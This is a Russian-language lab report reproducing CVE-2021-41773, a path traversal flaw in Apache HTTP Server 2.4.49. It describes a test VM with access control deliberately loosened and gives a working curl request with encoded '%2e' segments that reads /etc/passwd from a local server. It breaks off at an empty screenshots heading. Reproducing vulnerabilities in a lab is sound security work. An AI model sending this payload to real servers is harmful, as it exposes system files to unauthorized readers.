CVE-2021-41773: отчёт о воспроизведении уязвимости
Обзор уязвимости
- CVE ID: CVE-2021-41773
- Название уязвимости: Apache HTTP Server — уязвимость обхода пути
- Уровень риска: высокий (CVSS 7.5)
- Затронутые версии: Apache HTTP Server 2.4.49
- Описание уязвимости: В Apache HTTP Server версии 2.4.49 присутствует дефект реализации функции нормализации пути
ap_normalize_path. Атакующий может обойти контроль доступа, отправив специально сформированный запрос, содержащий закодированный %2e, и прочитать произвольные файлы на веб-сервере.
Развёртывание окружения
- Операционная система: Ubuntu 20.04 (виртуальная машина)
- Веб-сервер: Apache httpd 2.4.49 (ручная сборка из исходников)
- Лабораторный стенд: автономный запуск, прослушивание порта 8080
- Ключевая конфигурация:
- Заменить
Require all denied на Require all granted для <Directory />
- Добавить Alias
/vuln, указывающий на /tmp/vuln_dir, и установить права доступа
Воспроизведение уязвимости
Команда атаки
curl -v --path-as-is 'http://127.0.0.1:8080/vuln/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
Скриншоты атаки
